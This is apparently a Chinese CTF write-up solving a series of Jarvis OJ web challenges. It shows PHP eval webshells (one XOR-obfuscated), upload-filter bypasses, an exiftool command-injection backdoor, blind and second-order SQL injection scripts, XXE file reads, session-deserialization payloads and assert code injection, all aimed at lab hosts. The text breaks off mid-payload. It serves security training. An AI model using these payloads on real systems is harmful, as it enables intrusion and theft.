小明入侵了一台web服务器并上传了一句话木马，但是，管理员修补了漏洞，更改了权限。更重要的是：他忘记了木马的密码！你能帮助他夺回控制权限吗？ 点击管理员登陆按钮 12345678910&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;403 Forbidden&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Forbidden&lt;/h1&gt;&lt;p&gt;You don't have permission to access /admin/on this server.&lt;/p&gt;&lt;script&gt;alert('you are not admin!')&lt;/script&gt;&lt;!--&lt;script&gt;alert('admin ip is 202.5.19.128')&lt;/script&gt;--&gt;&lt;/body&gt;&lt;/html&gt; XFF发现没什么用 再看发现图片的URL如下 proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg 尝试双重文件包含,构造payload 123http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/回显:YOU'RE CLOOSING!这很坑必须是/admin/,之前一直试/admin都不行，还以为环境错了 考虑到题目说是一句话木马，所以现在是要找后门 123456789http://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/robots.txt回显:User-agent: *Disallow:trojan.phpDisallow:trojan.php.txthttp://web.jarvisoj.com:32782/proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/trojan.php.txt回显:&lt;?php $&#123;("#"^"|").("#"^"|")&#125;=("!"^"`").("( "^"&#123;").("("^"[").("~"^";").("|"^".").("*"^"~");$&#123;("#"^"|").("#"^"|")&#125;(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("&#125;"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&amp;"). ("#"^"p"). ("&gt;"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?&gt; 看不懂没关系，PHP运行一下 123Notice: Undefined offset: 360 in D:\phpstudy\WWW\trojan.php(1) : assert code on line 1Warning: assert(): Assertion "eval($_POST[360])" failed in D:\phpstudy\WWW\trojan.php on line 1 菜刀咯 flag:CTF{fl4g_1s_my_c40d40_1s_n0t_y0urs} Easy Gallery题目入口：http://web.jarvisoj.com:32785/ “没有什么防护是一个漏洞解决不了的，如果有，那就…..“ 有一个图片文件上传功能,提示说只能上传gif&amp;jpg 先上一个一句话 12GIF89a&lt;?php eval($_POST['a']); ?&gt; 抓包改后缀php%00.jpg成功上传但菜刀死活连不上 但我们看到View功能是文件包含链接到index.php?page=xxx的 1234http://web.jarvisoj.com:32785/index.php?page=uploads/1568382396.jpg回显：Warning: fopen(uploads/1568382396.jpg.php): failed to open stream: No such file or directory in /opt/lampp/htdocs/index.php on line 24No such file! 发现jpg后带了php,果断%00截断 You should not do this! 估计我们的一句话被过滤了，换下姿势 12345&lt;script language="phP"&gt;@eval($_POST['a']);&lt;/script&gt;#这里记住一句话后面不能有内容了，我不知道什么时候手贱多加一点，导致一直不能解析getflag,气死http://web.jarvisoj.com:32785/index.php?page=uploads/1568385564.gif%00#CTF&#123;upl0ad_sh0uld_n07_b3_a110wed&#125; 这里输入payload就getflag了，不用菜刀页也不用找flag路径，估计是题目考图片马，成功解析就行 Simple Injection题目入口：http://web.jarvisoj.com:32787/ 很简单的注入，大家试试？ 登录框的注入题，账号为admin是提示密码错误，反之则用户名错误，说明用户名为admin，下面进行测试 123admin' # 返回密码错误，说明'#没有过滤admin' or 1=1 # 返回用户名错误，说明可能过滤空格和or等关键字admin'/**/or/**/1=1# 返回密码错误，说明只过滤空格 总结，username存在sql注入，同时仅仅只是过滤了空格，那么就是一个盲注，密码错误即存在，下面给出网上payload还不是自己太菜不会写，理解一下就好 12345678910111213141516171819202122232425262728293031#encoding: utf-8#created by noble @ 2017.1.21import requestsurl = "http://web.jarvisoj.com:32787/login.php"table_name_temp = "admin'/**/and/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),&#123;0&#125;,1))&gt;&#123;1&#125;#"column_name_temp = "admin'/**/and/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=0x61646D696E/**/limit/**/2,1),&#123;0&#125;,1))&gt;&#123;1&#125;#"password_temp = "admin'/**/and/**/ascii(substr((select/**/password/**/from/**/admin/**/limit/**/0,1),&#123;0&#125;,1))&gt;&#123;1&#125;#"result = ""session = requests.Session()char = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"for i in range(1, 50): #设置字符长度为50 for c in char: asc = ord(c) #获取字符的ascii值 username = password_temp.format(i, asc) #print username data = &#123;'username': username, 'password': 'admin' &#125; req = session.post(url=url, data=data, timeout=10) status = req.status_code length = req.headers['content-length'] if status == 200: #print length #print req.text #返回的长度只有1202和1205 if length == "1205": result += c print c breakprint result 最后得到32位字符串，估计是md5，在线解得到密码eTAloCrEP flag:CTF{s1mpl3_1nJ3ction_very_easy!!} api调用题目入口：http://web.jarvisoj.com:9882/ 请设法获得目标机器/home/ctf/flag.txt中的flag值。 有一个提交框，输入什么就显示什么加上own,源码如下 1234567891011121314151617181920212223242526272829&lt;script&gt;function XHR() &#123; var xhr; try &#123;xhr = new XMLHttpRequest();&#125; catch(e) &#123; var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"]; for (var i=0,len=IEXHRVers.length;i&lt; len;i++) &#123; try &#123;xhr = new ActiveXObject(IEXHRVers[i]);&#125; catch(e) &#123;continue;&#125; &#125; &#125; return xhr; &#125;function send()&#123; evil_input = document.getElementById("evil-input").value; var xhr = XHR(); xhr.open("post","/api/v1.0/try",true); xhr.onreadystatechange = function () &#123; if (xhr.readyState==4 &amp;&amp; xhr.status==201) &#123; data = JSON.parse(xhr.responseText); tip_area = document.getElementById("tip-area"); tip_area.value = data.task.search+data.task.value; &#125; &#125;; xhr.setRequestHeader("Content-Type","application/json"); xhr.send('&#123;"search":"'+evil_input+'","value":"own"&#125;');&#125;&lt;/script&gt; 通过抓包发现传的json包 12345678910请求:&#123;"search":"cat flag","value":"own"&#125;回应:&#123; "task": &#123; "done": false, "search": "cat flag", "value": "own" &#125;&#125; 考虑到题目提示,想到了利用XXE读取文件 改Content-Type为application/xml,内容hack!,回显成功 构造payload123456&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE get[&lt;!ENTITY hack SYSTEM "file:///home/ctf/flag.txt"&gt;]&gt;&lt;get&gt;&amp;hack;&lt;/get&gt;#CTF&#123;XxE_15_n0T_S7range_Enough&#125; 图片上传漏洞题目入口：http://web.jarvisoj.com:32790/12请设法获取/home/ctf/flag.txt 中的flag值。(建议使用png文件上传) 这题纯属就是涨姿势了，之前的各种绕过都不行，后来才发现是个CVE参考 看WP说用exiftool生成图片马，但打死找不到生成的后门，我太菜了，本想借刀杀人用别人留下的马，但也连不上好像被搅屎了，日后再做 贴个payload exiftool -label=”\”|/bin/echo \&lt;?php \@eval(\$_POST[x])\;?> &gt;/opt/lampp/htdocs/uploads/x.php; \”” 1.png 上传然后filetype改为show PHPINFO题目入口：http://web.jarvisoj.com:32784/ 进去直接看到源码 1234567891011121314151617181920212223242526&lt;?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO&#123; public $mdzz; function __construct() &#123; $this-&gt;mdzz = 'phpinfo();'; &#125; function __destruct() &#123; eval($this-&gt;mdzz); &#125;&#125;if(isset($_GET['phpinfo']))&#123; $m = new OowoO();&#125;else&#123; highlight_string(file_get_contents('index.php'));&#125;?&gt; 传个phpinfo参数就能看到phpinfo,不知道要干嘛 继续学习姿势，网上WP 123ini_set('session.serialize_handler', 'php');#ini_set设置指定配置选项的值。这个选项会在脚本运行时保持新的值，并在脚本结束时恢复。这是突破点 session.serialize_handler容易想到wooyun上的文章《PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患》。 通过phpinfo页面，我们知道php.ini中默认session.serialize_handler为php_serialize，而index.php中将其设置为php。这就导致了seesion的反序列化问题。 由phpinfo()页面知，session.upload_progress.enabled为On。当一个上传在处理中，同时POST一个与INI中设置的session.upload_progress.name同名变量时，当PHP检测到这种POST请求时，它会在$_SESSION中添加一组数据。所以可以通过Session Upload Progress来设置session 但是，这时就有一个问题，在题目代码中，没有某个值是用来接受我们传入的数据，并储存到$_SESSION中的。其实我们是有办法传入$_SESSION数据的，这里就利用到了|的反序列化问题 先构造上传和post同时进行的页面 123456789101112131415&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt; &lt;title&gt;test&lt;/title&gt; &lt;meta charset="utf-8"&gt;&lt;/head&gt;&lt;body&gt; &lt;form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"&gt;&lt;!-- 不对字符编码--&gt; &lt;input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /&gt; &lt;input type="file" name="file" /&gt; &lt;input type="submit" value="上传" /&gt; &lt;/form&gt;&lt;/body&gt;&lt;/html&gt; 接下来考虑序列化的问题。 123456789class OowoO&#123; public $mdzz='print_r(scandir(dirname(__FILE__)));';#打印读取的文件内容&#125;$a = new OowoO();$b = serialize($a);echo $b;# O:5:"OowoO":1:&#123;s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";&#125; 为防止转义，在引号前加上\。利用前面的html页面随便上传一个东西，抓包，把filename改为如下 |O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:36:\”print_r(scandir(dirname(FILE)));\”;} 注意前面有| ,然后随便上传东西抓包,为filename为上述,得到回显 12345678&lt;/code&gt;Array( [0] =&gt; . [1] =&gt; .. [2] =&gt; Here_1s_7he_fl4g_buT_You_Cannot_see.php [3] =&gt; index.php [4] =&gt; phpinfo.php) 根据phpinfo得到路径/opt/lampp/htdocs/ 12345$mdzz改为:print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));↓O:5:"OowoO":1:&#123;s:4:"mdzz";s:88:"print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));";&#125;↓|O:5:\"OowoO\":1:&#123;s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";&#125; 抓包改filename 123&lt;/code&gt;&lt;?php $flag="CTF&#123;4d96e37f4be998c50aa586de4ada354a&#125;";?&gt; 参考资料 WEB?题目入口：http://web.jarvisoj.com:9891/ 这么简单的题，是WEB吗？ 有个密码输入框，随便输入点返回Wrong Password!! 查源码发现有个app.js点进去,查找Wrong Password!!,主要代码如下 12345678910111213141516171819202122232425262728293031323334353637&#123; key: "__checkpass__REACT_HOT_LOADER__", value: function(e) &#123; if (25 !== e.length) return ! 1; for (var t = [], n = 0; n &lt; 25; n++) t.push(e.charCodeAt(n)); for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259], o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]], n = 0; n &lt; 25; n++) &#123; for (var i = 0, a = 0; a &lt; 25; a++) i += t[a] * o[n][a]; if (i !== r[n]) return ! 1 &#125; return ! 0 &#125; &#125;, &#123; key: "__handleTouchTap__REACT_HOT_LOADER__", value: function() &#123; var e = this.state.passcontent, t = &#123; passowrd: e &#125;; self = this, $.post("checkpass.json", t, function(t) &#123; self.checkpass(e) ? self.setState(&#123; errmsg: "Success!!", errcolor: b.green400 &#125;) : (self.setState(&#123; errmsg: "Wrong Password!!", errcolor: b.red400 &#125;), setTimeout(function() &#123; self.setState(&#123; errmsg: "" &#125;) &#125;, 3e3)) &#125;) &#125; 是个25元一次方程，求解 123456789101112# -*- coding:utf-8 -*-import numpy as npa = np.array([325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259])b = np.array([[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]])x = np.linalg.solve(b,a)print xflag=''for i in x: flag += chr(int(round(i)))print flag#QWB&#123;R3ac7_1s_interesting&#125; [61dctf]admin题目入口：http://web.jarvisoj.com:32792/ 访问robots.txt发现admin_s3cr3t.php flag{hello guest} 妈的居然是假的 抓包admin=1 flag{hello_admin~} [61dctf]inject题目入口：http://web.jarvisoj.com:32794/ Hint1: 先找到源码再说吧~~ /index.php~找到源码 12345678910&lt;?phprequire("config.php");$table = $_GET['table']?$_GET['table']:"test";#当未输入table参数时，table的值默认为test;当输入了table的参数时，table的值为输入的值$table = Filter($table);mysqli_query($mysqli,"desc `secret_&#123;$table&#125;`") or Hacker();$sql = "select 'flag&#123;xxx&#125;' from secret_&#123;$table&#125;";$ret = sql_query($sql);echo $ret[0];?&gt; 先看一下这个desc desc table是显示数据表的表都定义了哪些字段，及各个字段的类型大小，及哪些是主键，哪些有约束条件，以及各个字段是否定义了默认值 下面本地测试一下 123456789101112131415161718192021222324252627282930313233343536mysql&gt; show tables;+----------------+| Tables_in_test |+----------------+| liuyan || test1 || test2 || users |+----------------+4 rows in set (0.00 sec)mysql&gt; desc users;+----------+--------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+----------+--------------+------+-----+---------+----------------+| Id | int(11) | NO | PRI | NULL | auto_increment || username | varchar(255) | NO | | | || password | varchar(255) | NO | | | |+----------+--------------+------+-----+---------+----------------+3 rows in set (0.01 sec)mysql&gt; desc `users`;+----------+--------------+------+-----+---------+----------------+| Field | Type | Null | Key | Default | Extra |+----------+--------------+------+-----+---------+----------------+| Id | int(11) | NO | PRI | NULL | auto_increment || username | varchar(255) | NO | | | || password | varchar(255) | NO | | | |+----------+--------------+------+-----+---------+----------------+3 rows in set (0.01 sec)mysql&gt; desc 'users';ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users'' at line 1mysql&gt; desc "users";ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"users"' at line 1mysql&gt; 以上我们可以看到desc table === desc `table`(反引号，这题所考察的) 引申出来可以知道desc `table1` `table2`; 只要前者表存在，该语句是能执行的 根据源码可知,test表是存在的，且table是可控的，下面构造payload123456789101112131415161718192021222324查库:?table=test` `union select database() limit 1,1回显:61d300 查表:?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,1回显:secret_flag,secret_test查列:本来想直接如此:?table=test` `union select * from secret_flag发现被waf挡了,只能老实查列查内容?table=test` `union select column_name from information_schema.columns where table_name=secret_flag limit 1,1发现老是不回显想要的，一时间卡住了，后来直接不加where语句就成了233?table=test` `union select column_name from information_schema.columns limit 1,1回显:flagUwillNeverKnow#?table=test` `union select column_name from information_schema.columns where table_schema=database() limit 1,1这样也行#后面发现secret_flag改成0x7365637265745f666c6167就行了~查内容:?table=test` `union select flagUwillNeverKnow from secret_flag limit 1,1回显:flag&#123;luckyGame~&#125; [61dctf]register题目入口：http://web.jarvisoj.com:32796/123Hint1: 二次注入Hint2: register 二次注入在country index.php是一个登陆界面，fuzzing没发现注入点 一波扫描 URL 响应 备注 http://web.jarvisoj.com:32796/test.php 200 NULL http://web.jarvisoj.com:32796/login.php 200 index.php http://web.jarvisoj.com:32796/config.php 200 空白页 http://web.jarvisoj.com:32796/register.php 200 注册页 http://web.jarvisoj.com:32796/hacker.php 200 waf页 注册一波 country=China&amp;username=jax&amp;password=123&amp;address=123 根据提示找到country页面/index.php?page=info，发现 Country Address Date China 123 2019-09-18 19:41:21 注入点在country,分别尝试’or’2’&lt;’1’# Country Address Date &lt;’or\‘2\‘&lt;\‘1\‘# 123 2019-09-18 12:08:07 基本是知道了语句的执行与否会带来时间的不同，大概是时区问题吧，正确就是北京时间，这样就是一个布尔盲注了 二次注入也是第一次接触，参考网上payload并分析一下 ‘ or ascii(substr((select group_concat(a) from(select 1,2,3`a`,4,5 union select * from users)`b`),1,1))&gt;0x19# 12345678910111213141516171819202122232425262728mysql&gt; select * from users;+----+----------+----------+| Id | username | password |+----+----------+----------+| 1 | root | root || 2 | admin | admin || 3 | test | test |+----+----------+----------+3 rows in set (0.00 sec)mysql&gt; SELECT GROUP_CONCAT(a) FROM (SELECT 1,2,3`a` UNION SELECT * from users)`b`;+-------------------+| GROUP_CONCAT(a) |+-------------------+| 3,root,admin,test |+-------------------+1 row in set (0.00 sec)mysql&gt; SELECT GROUP_CONCAT(a) FROM (SELECT 1,2,3 as `a` UNION SELECT * from users)as `b`;+-------------------+| GROUP_CONCAT(a) |+-------------------+| 3,root,admin,test |+-------------------+1 row in set (0.00 sec)mysql&gt; SELECT GROUP_CONCAT(a) FROM (SELECT 1,2,3 as `a` UNION SELECT * from users);ERROR 1248 (42000): Every derived table must have its own alias 通过测试可知3 as `a` === 3`a` ,为什么这样，主要是因为country有长度限制，而后面的`b`则是语法问题需要如此 下面直接上脚本 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879# coding=utf-8import datetimeimport requestsimport restart = datetime.datetime.now()url0 = "http://web.jarvisoj.com:32796/index.php"url1 = "http://web.jarvisoj.com:32796/register.php"url2 = "http://web.jarvisoj.com:32796/login.php"url3 = "http://web.jarvisoj.com:32796/index.php?page=info"sqlquery = "SELECT GROUP_CONCAT(a) FROM (SELECT 1,2,3`a`,4,5 UNION SELECT * from users)`b`"result = ''num = 0length = 1finish = Falsedef check():#使用group_concat会出现, count = 0 for i in result: if i == ',': count += 1 return countwhile not finish: left = 0x19 right = 0x81 while True: mid = (left + right) // 2 data1 = &#123; "country": "'or ASCII(SUBSTR((&#123;&#125;),&#123;&#125;,1))&gt;&#123;&#125;#".format(sqlquery, length, mid), "username": "9Cy9Nus"+str(num), "password": "123", "address": "123" &#125; data2 = &#123; "username": "9Cy9Nus"+str(num), "password": "123" &#125; num += 1 s = requests.session() s.get(url0) s.post(url1, data=data1) s.post(url2, data=data2) res = s.get(url3) text = res.text print data1['country'] #根据做题时间修改(一般错误是后退8小时) if '&lt;em&gt;2019-09-18 16' in text:#语句正确 if mid == left: if left == 0x19: #finish = True break print 'result: '+str(left) result += chr(left) print result break left = left right = mid else:#语句正确 if mid == left: print 'result: '+str(right) result += chr(right) print result break left = mid right = right length += 1 if check() == 2: finish = Trueprint resultend = datetime.datetime.now()print (end-start)# 9a73fd18fedd9643357ffe20b9d974e4# CleverBoy 借鉴大佬的脚本，其实就是直接用 参考1参考2 [61dctf]babyphp题目入口：http://web.jarvisoj.com:32798/ Hint1: 此题缺少关键解题文件的问题已修复。 ?page=about 12345678About昨儿做梦的时候我在梦里写了这个网站印象中我用了这些东西:PHPGITBootstrap 看到git想到源码泄露一个git泄露利用脚本 1234567891011121314D:\小工具\githack\GitHack&gt;python GitHack.py http://web.jarvisoj.com:32798/.git[+] Download and parse index file ...index.phptemplates/about.phptemplates/contact.phptemplates/flag.phptemplates/home.php[Error] [Error 183] : u'web.jarvisoj.com_32798\\templates'[Error] [Error 183] : u'web.jarvisoj.com_32798\\templates'[OK] templates/flag.php[OK] index.php[OK] templates/home.php[OK] templates/contact.php[OK] templates/about.php 成功down下源码,主要代码index.php 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354&lt;?phpif (isset($_GET['page'])) &#123; $page = $_GET['page'];&#125; else &#123; $page = "home";&#125;$file = "templates/" . $page . ".php";assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");assert("file_exists('$file')") or die("That file doesn't exist!");?&gt;&lt;!DOCTYPE html&gt;&lt;html&gt; &lt;head&gt; &lt;meta charset="utf-8"&gt; &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt; &lt;title&gt;My PHP Website&lt;/title&gt; &lt;link rel="stylesheet" href="http://libs.baidu.com/bootstrap/3.0.3/css/bootstrap.min.css" /&gt; &lt;/head&gt; &lt;body&gt; &lt;nav class="navbar navbar-inverse navbar-fixed-top"&gt; &lt;div class="container"&gt; &lt;div class="navbar-header"&gt; &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"&gt; &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt; &lt;span class="icon-bar"&gt;&lt;/span&gt; &lt;span class="icon-bar"&gt;&lt;/span&gt; &lt;span class="icon-bar"&gt;&lt;/span&gt; &lt;/button&gt; &lt;a class="navbar-brand" href="#"&gt;Project name&lt;/a&gt; &lt;/div&gt; &lt;div id="navbar" class="collapse navbar-collapse"&gt; &lt;ul class="nav navbar-nav"&gt; &lt;li &lt;?php if ($page == "home") &#123; ?&gt;class="active"&lt;?php &#125; ?&gt;&gt;&lt;a href="?page=home"&gt;Home&lt;/a&gt;&lt;/li&gt; &lt;li &lt;?php if ($page == "about") &#123; ?&gt;class="active"&lt;?php &#125; ?&gt;&gt;&lt;a href="?page=about"&gt;About&lt;/a&gt;&lt;/li&gt; &lt;li &lt;?php if ($page == "contact") &#123; ?&gt;class="active"&lt;?php &#125; ?&gt;&gt;&lt;a href="?page=contact"&gt;Contact&lt;/a&gt;&lt;/li&gt; &lt;!--&lt;li &lt;?php if ($page == "flag") &#123; ?&gt;class="active"&lt;?php &#125; ?&gt;&gt;&lt;a href="?page=flag"&gt;My secrets&lt;/a&gt;&lt;/li&gt; --&gt; &lt;/ul&gt; &lt;/div&gt; &lt;/div&gt; &lt;/nav&gt; &lt;div class="container" style="margin-top: 50px"&gt; &lt;?php require_once $file; ?&gt; &lt;/div&gt; &lt;script src="http://code.jquery.com/jquery-latest.js" /&gt; &lt;script src="http://libs.baidu.com/bootstrap/3.0.3/js/bootstrap.min.js" /&gt; &lt;/body&gt;&lt;/html&gt; 先看一下strpos() 12strpos() 函数查找字符串在另一字符串中第一次出现的位置。返回字符串在另一字符串中第一次出现的位置，如果没有找到字符串则返回 FALSE。 下面为绕过 123$ file ="templates /（我们插入的内容）.php"然而不能出现"..",也就是不能目录穿越理论上我们想要如此：system('cat templates/flag.php'); 所以插入如下 1234567','t')=== system('cat templates/flag.php');//得到assert("strpos('"templates/" 